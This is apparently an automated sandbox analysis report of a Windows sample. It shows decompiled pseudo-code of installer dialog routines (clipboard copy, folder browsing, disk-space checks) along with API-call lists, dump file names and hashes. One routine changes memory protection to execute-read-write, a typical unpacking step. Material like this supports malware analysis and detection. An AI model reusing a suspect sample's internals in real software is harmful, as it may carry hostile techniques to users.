                                                                                                                                                                                                          					 *0x72e3403c = 0;
                                                                                                                                                                                                          					 *0x72e34044 = 0;
                                                                                                                                                                                                          					 *0x72e34058 = 0;
                                                                                                                                                                                                          					 *0x72e34048 = 0;
                                                                                                                                                                                                          					 *0x72e34040 = 0;
                                                                                                                                                                                                          					 *0x72e34050 = 0;
                                                                                                                                                                                                          					 *0x72e3404e = 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                          			}




                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(72E3404C,00000004,00000040,72E3403C), ref: 72E3293F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167878164.0000000072E31000.00000020.00020000.sdmp, Offset: 72E30000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167873253.0000000072E30000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167884351.0000000072E33000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167889901.0000000072E35000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                          • Opcode ID: 532a3df30216d43ba0e417e0063ea9de8fb92762706b740eb7274e856daf210e
                                                                                                                                                                                                          • Instruction ID: 1fc97f4c5899db4a9ccaffe9a1af681ea0013c8a052b824c1b1f3fce7d9ee240
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 532a3df30216d43ba0e417e0063ea9de8fb92762706b740eb7274e856daf210e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8F074BA788249DEC351CB6A8C847053BE8A314257BA1896EE598D6243E33448848F12
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E0040343E(long _a4) {
                                                                                                                                                                                                          				long _t2;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                                                                                                                                          				return _t2;
                                                                                                                                                                                                          			}





                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                          • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                                                                                                                          • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                          			E004054B2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                                                                                                                          				struct HWND__* _v8;
                                                                                                                                                                                                          				struct tagRECT _v24;
                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                          				int _v40;
                                                                                                                                                                                                          				int _v44;
                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                          				int _v52;
                                                                                                                                                                                                          				void* _v56;
                                                                                                                                                                                                          				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec24; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405446, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062E0(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a8b8;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ec0c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f448, 8);
							__eflags =  *0x42f4ec - _t150;
							if( *0x42f4ec == _t150) {
								E00405374( *((intOrPtr*)( *0x42a090 + 0x34)), _t150);
							}
							E004042AA(1);
							goto L25;
						}
						 *0x429c88 = 2;
						E004042AA(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404338(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ec10, _t150);
						ShowWindow(_v8, 8);
						E00404306(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f454;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ec10 = GetDlgItem(_a4, 0x403);
				 *0x42ec08 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec24 = _t128;
				_v8 = _t128;
				E00404306( *0x42ec10);
				 *0x42ec14 = E00404BF7(4);
				 *0x42ec2c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042D1(_a4);
				if(( *0x42f45c & 0x00000003) != 0) {
                                                                                                                                                                                                          					ShowWindow( *0x42ec10, _t150);
                                                                                                                                                                                                          					if(( *0x42f45c & 0x00000002) != 0) {
                                                                                                                                                                                                          						 *0x42ec10 = _t150;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						ShowWindow(_v8, 8);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					E00404306( *0x42ec08);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t161 = GetDlgItem(_a4, 0x3ec);
                                                                                                                                                                                                          				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                                                                                                                                                                          				if(( *0x42f45c & 0x00000004) != 0) {
                                                                                                                                                                                                          					SendMessageA(_t161, 0x409, _t150, _a8);
                                                                                                                                                                                                          					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				goto L36;
                                                                                                                                                                                                          			}



































                                                                                                                                                                                                          0x004055d2
                                                                                                                                                                                                          0x004055d7
                                                                                                                                                                                                          0x004055e3
                                                                                                                                                                                                          0x004055ec
                                                                                                                                                                                                          0x004055f9
                                                                                                                                                                                                          0x00405608
                                                                                                                                                                                                          0x004055fb
                                                                                                                                                                                                          0x00405600
                                                                                                                                                                                                          0x00405600
                                                                                                                                                                                                          0x00405614
                                                                                                                                                                                                          0x00405614
                                                                                                                                                                                                          0x00405628
                                                                                                                                                                                                          0x00405631
                                                                                                                                                                                                          0x0040563a
                                                                                                                                                                                                          0x0040564a
                                                                                                                                                                                                          0x00405656
                                                                                                                                                                                                          0x00405656
                                                                                                                                                                                                          0x00000000

APIs
• GetDlgItem.USER32(?,00000403), ref: 00405511
• GetDlgItem.USER32(?,000003EE), ref: 00405520
• GetClientRect.USER32 ref: 0040555D
• GetSystemMetrics.USER32 ref: 00405564
• SendMessageA.USER32 ref: 00405585
• SendMessageA.USER32 ref: 00405596
• SendMessageA.USER32 ref: 004055A9
• SendMessageA.USER32 ref: 004055B7
• SendMessageA.USER32 ref: 004055CA
• ShowWindow.USER32(00000000,?), ref: 004055EC
• ShowWindow.USER32(?,00000008), ref: 00405600
• GetDlgItem.USER32(?,000003EC), ref: 00405621
• SendMessageA.USER32 ref: 00405631
• SendMessageA.USER32 ref: 0040564A
• SendMessageA.USER32 ref: 00405656
• GetDlgItem.USER32(?,000003F8), ref: 0040552F
  • Part of subcall function 00404306: SendMessageA.USER32 ref: 00404314
• GetDlgItem.USER32(?,000003EC), ref: 00405672
• CreateThread.KERNEL32(00000000,00000000,Function_00005446,00000000), ref: 00405680
• CloseHandle.KERNEL32(00000000), ref: 00405687
• ShowWindow.USER32(00000000), ref: 004056AA
• ShowWindow.USER32(?,00000008), ref: 004056B1
• ShowWindow.USER32(00000008), ref: 004056F7
• SendMessageA.USER32 ref: 0040572B
• CreatePopupMenu.USER32 ref: 0040573C
• AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405751
• GetWindowRect.USER32 ref: 00405771
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
• SendMessageA.USER32 ref: 004057C6
• OpenClipboard.USER32(00000000), ref: 004057D6
• EmptyClipboard.USER32 ref: 004057DC
• GlobalAlloc.KERNEL32(00000042,?), ref: 004057E5
• GlobalLock.KERNEL32 ref: 004057EF
• SendMessageA.USER32 ref: 00405803
• GlobalUnlock.KERNEL32(00000000), ref: 0040581C
• SetClipboardData.USER32 ref: 00405827
• CloseClipboard.USER32 ref: 0040582D

Memory Dump Source
• Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp
• Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp

Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID:
• API String ID: 590372296-0
• Opcode ID: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
• Instruction ID: 3d94e6139f86797c0ae92d92c46aaabaef2c33f238587a010477577dd15b8479
• Opcode Fuzzy Hash: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
• Instruction Fuzzy Hash: 1BA17C71900608BFDB11AFA1DE45EAE3B79FB08354F40443AFA45B61A0CB754E51DF68

Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                                          			E00404763(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                          				long _v36;
                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                          				unsigned int _v44;
                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                          				CHAR* _v56;
                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                          				CHAR* _v72;
                                                                                                                                                                                                          				void _v76;
                                                                                                                                                                                                          				struct HWND__* _v80;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				intOrPtr _t82;
                                                                                                                                                                                                          				long _t87;
                                                                                                                                                                                                          				signed char* _t89;
                                                                                                                                                                                                          				void* _t95;
                                                                                                                                                                                                          				signed int _t96;
                                                                                                                                                                                                          				int _t109;
                                                                                                                                                                                                          				signed char _t114;
                                                                                                                                                                                                          				signed int _t118;
                                                                                                                                                                                                          				struct HWND__** _t122;
                                                                                                                                                                                                          				intOrPtr* _t138;
                                                                                                                                                                                                          				CHAR* _t146;
                                                                                                                                                                                                          				intOrPtr _t147;
                                                                                                                                                                                                          				unsigned int _t150;
                                                                                                                                                                                                          				signed int _t152;
                                                                                                                                                                                                          				unsigned int _t156;
                                                                                                                                                                                                          				signed int _t158;
                                                                                                                                                                                                          				signed int* _t159;
                                                                                                                                                                                                          				signed char* _t160;
                                                                                                                                                                                                          				struct HWND__* _t165;
                                                                                                                                                                                                          				struct HWND__* _t166;
                                                                                                                                                                                                          				int _t168;
                                                                                                                                                                                                          				unsigned int _t197;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t156 = __edx;
                                                                                                                                                                                                          				_t82 =  *0x42a090;
                                                                                                                                                                                                          				_v32 = _t82;
                                                                                                                                                                                                          				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
                                                                                                                                                                                                          				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                                                                                                                                          				if(_a8 == 0x40b) {
                                                                                                                                                                                                          					E0040594D(0x3fb, _t146);
                                                                                                                                                                                                          					E00406528(_t146);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t166 = _a4;
                                                                                                                                                                                                          				if(_a8 != 0x110) {
                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                          					if(_a8 != 0x111) {
                                                                                                                                                                                                          						L20:
                                                                                                                                                                                                          						if(_a8 == 0x40f) {
                                                                                                                                                                                                          							L22:
                                                                                                                                                                                                          							_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                          							_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                          							E0040594D(0x3fb, _t146);
                                                                                                                                                                                                          							if(E00405CD3(_t185, _t146) == 0) {
                                                                                                                                                                                                          								_v8 = 1;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							E0040624D(0x429888, _t146);
                                                                                                                                                                                                          							_t87 = E00406656(1);
                                                                                                                                                                                                          							_v16 = _t87;
                                                                                                                                                                                                          							if(_t87 == 0) {
                                                                                                                                                                                                          								L30:
                                                                                                                                                                                                          								E0040624D(0x429888, _t146);
                                                                                                                                                                                                          								_t89 = E00405C7E(0x429888);
                                                                                                                                                                                                          								_t158 = 0;
                                                                                                                                                                                                          								if(_t89 != 0) {
                                                                                                                                                                                                          									 *_t89 =  *_t89 & 0x00000000;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(GetDiskFreeSpaceA(0x429888,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                                                                                                                                          									goto L35;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t168 = 0x400;
                                                                                                                                                                                                          									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                                                                                                                                          									asm("cdq");
                                                                                                                                                                                                          									_v48 = _t109;
                                                                                                                                                                                                          									_v44 = _t156;
                                                                                                                                                                                                          									_v12 = 1;
                                                                                                                                                                                                          									goto L36;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t159 = 0;
                                                                                                                                                                                                          								if(0 == 0x429888) {
                                                                                                                                                                                                          									goto L30;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									goto L26;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								while(1) {
                                                                                                                                                                                                          									L26:
                                                                                                                                                                                                          									_t114 = _v16(0x429888,  &_v48,  &_v28,  &_v40);
                                                                                                                                                                                                          									if(_t114 != 0) {
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									if(_t159 != 0) {
                                                                                                                                                                                                          										 *_t159 =  *_t159 & _t114;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t160 = E00405C2C(0x429888);
                                                                                                                                                                                                          									 *_t160 =  *_t160 & 0x00000000;
                                                                                                                                                                                                          									_t159 = _t160 - 1;
                                                                                                                                                                                                          									 *_t159 = 0x5c;
                                                                                                                                                                                                          									if(_t159 != 0x429888) {
                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										goto L30;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t150 = _v44;
                                                                                                                                                                                                          								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                                                                                                                                          								_v44 = _t150 >> 0xa;
                                                                                                                                                                                                          								_v12 = 1;
                                                                                                                                                                                                          								_t158 = 0;
                                                                                                                                                                                                          								__eflags = 0;
                                                                                                                                                                                                          								L35:
                                                                                                                                                                                                          								_t168 = 0x400;
                                                                                                                                                                                                          								L36:
                                                                                                                                                                                                          								_t95 = E00404BF7(5);
                                                                                                                                                                                                          								if(_v12 != _t158) {
                                                                                                                                                                                                          									_t197 = _v44;
                                                                                                                                                                                                          									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                                                                                                                                          										_v8 = 2;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t147 =  *0x42ec1c; // 0x590f48
                                                                                                                                                                                                          								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                                                                                                                                                                          									E00404BDF(0x3ff, 0xfffffffb, _t95);
                                                                                                                                                                                                          									if(_v12 == _t158) {
                                                                                                                                                                                                          										SetDlgItemTextA(_a4, _t168, 0x429878);
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										E00404B1A(_t168, 0xfffffffc, _v48, _v44);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t96 = _v8;
                                                                                                                                                                                                          								 *0x42f504 = _t96;
                                                                                                                                                                                                          								if(_t96 == _t158) {
                                                                                                                                                                                                          									_v8 = E0040140B(7);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                                                                                                                                                                          									_v8 = _t158;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								E004042F3(0 | _v8 == _t158);
                                                                                                                                                                                                          								if(_v8 == _t158 &&  *0x42a8a8 == _t158) {
                                                                                                                                                                                                          									E004046BC();
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								 *0x42a8a8 = _t158;
                                                                                                                                                                                                          								goto L53;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t185 = _a8 - 0x405;
                                                                                                                                                                                                          						if(_a8 != 0x405) {
                                                                                                                                                                                                          							goto L53;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t118 = _a12 & 0x0000ffff;
                                                                                                                                                                                                          					if(_t118 != 0x3fb) {
                                                                                                                                                                                                          						L12:
                                                                                                                                                                                                          						if(_t118 == 0x3e9) {
                                                                                                                                                                                                          							_t152 = 7;
                                                                                                                                                                                                          							memset( &_v76, 0, _t152 << 2);
                                                                                                                                                                                                          							_v80 = _t166;
                                                                                                                                                                                                          							_v72 = 0x42a8b8;
                                                                                                                                                                                                          							_v60 = E00404AB4;
                                                                                                                                                                                                          							_v56 = _t146;
                                                                                                                                                                                                          							_v68 = E004062E0(_t146, 0x42a8b8, _t166, 0x429c90, _v12);
                                                                                                                                                                                                          							_t122 =  &_v80;
                                                                                                                                                                                                          							_v64 = 0x41;
                                                                                                                                                                                                          							__imp__SHBrowseForFolderA(_t122);
                                                                                                                                                                                                          							if(_t122 == 0) {
                                                                                                                                                                                                          								_a8 = 0x40f;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								__imp__CoTaskMemFree(_t122);
                                                                                                                                                                                                          								E00405BE5(_t146);
                                                                                                                                                                                                          								_t125 =  *((intOrPtr*)( *0x42f454 + 0x11c));
                                                                                                                                                                                                          								if( *((intOrPtr*)( *0x42f454 + 0x11c)) != 0 && _t146 == "C:\\Users\\Albus\\AppData\\Local\\Temp") {
                                                                                                                                                                                                          									E004062E0(_t146, 0x42a8b8, _t166, 0, _t125);
                                                                                                                                                                                                          									if(lstrcmpiA(0x42e3e0, 0x42a8b8) != 0) {
                                                                                                                                                                                                          										lstrcatA(_t146, 0x42e3e0);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								 *0x42a8a8 =  *0x42a8a8 + 1;
                                                                                                                                                                                                          								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L20;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_a12 >> 0x10 != 0x300) {
                                                                                                                                                                                                          						goto L53;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_a8 = 0x40f;
                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t165 = GetDlgItem(_t166, 0x3fb);
                                                                                                                                                                                                          					if(E00405C52(_t146) != 0 && E00405C7E(_t146) == 0) {
                                                                                                                                                                                                          						E00405BE5(_t146);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *0x42ec18 = _t166;
                                                                                                                                                                                                          					SetWindowTextA(_t165, _t146);
                                                                                                                                                                                                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                                                                                                                          					_push(1);
                                                                                                                                                                                                          					E004042D1(_t166);
                                                                                                                                                                                                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                                                                                                          					_push(0x14);
                                                                                                                                                                                                          					E004042D1(_t166);
                                                                                                                                                                                                          					E00404306(_t165);
                                                                                                                                                                                                          					_t138 = E00406656(8);
                                                                                                                                                                                                          					if(_t138 == 0) {
                                                                                                                                                                                                          						L53:
                                                                                                                                                                                                          						return E00404338(_a8, _a12, _a16);
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						 *_t138(_t165, 1);
                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}














































                                                                                                                                                                                                          0x00404882
                                                                                                                                                                                                          0x00404886
                                                                                                                                                                                                          0x0040488d
                                                                                                                                                                                                          0x00404895
                                                                                                                                                                                                          0x004048ef
                                                                                                                                                                                                          0x00404897
                                                                                                                                                                                                          0x00404898
                                                                                                                                                                                                          0x0040489f
                                                                                                                                                                                                          0x004048a9
                                                                                                                                                                                                          0x004048b1
                                                                                                                                                                                                          0x004048be
                                                                                                                                                                                                          0x004048d2
                                                                                                                                                                                                          0x004048d6
                                                                                                                                                                                                          0x004048d6
                                                                                                                                                                                                          0x004048d2
                                                                                                                                                                                                          0x004048db
                                                                                                                                                                                                          0x004048e8
                                                                                                                                                                                                          0x004048e8
                                                                                                                                                                                                          0x00404895
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040484d
                                                                                                                                                                                                          0x0040483b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404841
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004047ac
                                                                                                                                                                                                          0x004047b9
                                                                                                                                                                                                          0x004047c2
                                                                                                                                                                                                          0x004047cf
                                                                                                                                                                                                          0x004047cf
                                                                                                                                                                                                          0x004047d6
                                                                                                                                                                                                          0x004047dc
                                                                                                                                                                                                          0x004047e5
                                                                                                                                                                                                          0x004047e8
                                                                                                                                                                                                          0x004047eb
                                                                                                                                                                                                          0x004047f3
                                                                                                                                                                                                          0x004047f6
                                                                                                                                                                                                          0x004047f9
                                                                                                                                                                                                          0x004047ff
                                                                                                                                                                                                          0x00404806
                                                                                                                                                                                                          0x0040480d
                                                                                                                                                                                                          0x00404a9f
                                                                                                                                                                                                          0x00404ab1
                                                                                                                                                                                                          0x00404813
                                                                                                                                                                                                          0x00404816
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404816
                                                                                                                                                                                                          0x0040480d

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 004047B2
                                                                                                                                                                                                          • SetWindowTextA.USER32(00000000,?), ref: 004047DC
                                                                                                                                                                                                          • SHBrowseForFolderA.SHELL32(?,00429C90,?), ref: 0040488D
                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404898
                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(Call,0042A8B8,00000000,?,?), ref: 004048CA
                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,Call), ref: 004048D6
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004048E8
                                                                                                                                                                                                            • Part of subcall function 0040594D: GetDlgItemTextA.USER32 ref: 00405960
                                                                                                                                                                                                            • Part of subcall function 00406528: CharNextA.USER32(?), ref: 00406580
                                                                                                                                                                                                            • Part of subcall function 00406528: CharNextA.USER32(?), ref: 0040658D
                                                                                                                                                                                                            • Part of subcall function 00406528: CharNextA.USER32(?), ref: 00406592
                                                                                                                                                                                                            • Part of subcall function 00406528: CharPrevA.USER32(?,?), ref: 004065A2
                                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(00429888,?,?,0000040F,?,00429888,00429888,?,00000001,00429888,?,?,000003FB,?), ref: 004049A6
                                                                                                                                                                                                          • MulDiv.KERNEL32 ref: 004049C1
                                                                                                                                                                                                            • Part of subcall function 00404B1A: lstrlenA.KERNEL32(0042A8B8,0042A8B8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A35,000000DF,00000000,00000400,?), ref: 00404BB8
                                                                                                                                                                                                            • Part of subcall function 00404B1A: wsprintfA.USER32 ref: 00404BC0
                                                                                                                                                                                                            • Part of subcall function 00404B1A: SetDlgItemTextA.USER32(?,0042A8B8), ref: 00404BD3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
